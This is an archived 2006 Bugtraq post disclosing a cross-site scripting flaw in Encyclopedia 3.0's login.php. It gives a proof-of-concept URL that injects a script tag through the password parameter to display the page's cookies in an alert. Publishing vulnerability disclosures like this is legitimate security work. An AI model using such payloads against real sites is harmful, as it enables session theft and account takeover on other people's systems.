Encyclopedia <= 3.0 (login.php) CrossSite Scripting - XSS

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Encyclopedia <= 3.0 (login.php) CrossSite Scripting - XSS
From: n0m3rcy@xxxxxxxxxxx
Date: 14 Apr 2006 14:47:05 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

# Encyclopedia <= 3.0 (login.php) CrossSite Scripting - XSS
# by n0m3rcy
# Copyright (c) 2006 n0m3rcy <n0m3rcy@xxxxxxxxxxx>
# Exploit:
www.site.com/login.php?action=form&username=<username>&password=%22%3E%3Cscript%3Ealert(document.cookies);%3C/script%3E
# Shoutz:
cijfer , my baby , Dag & myself :PpP
# Have phun!

Prev by Date: Re: phpMyAdmin 2.7.0-pl1
Next by Date: phpBB Admin command execution
Previous by thread: RE: osCommerce "extras/" information/source code disclosure
Next by thread: phpBB Admin command execution
Index(es):
- Date
- Thread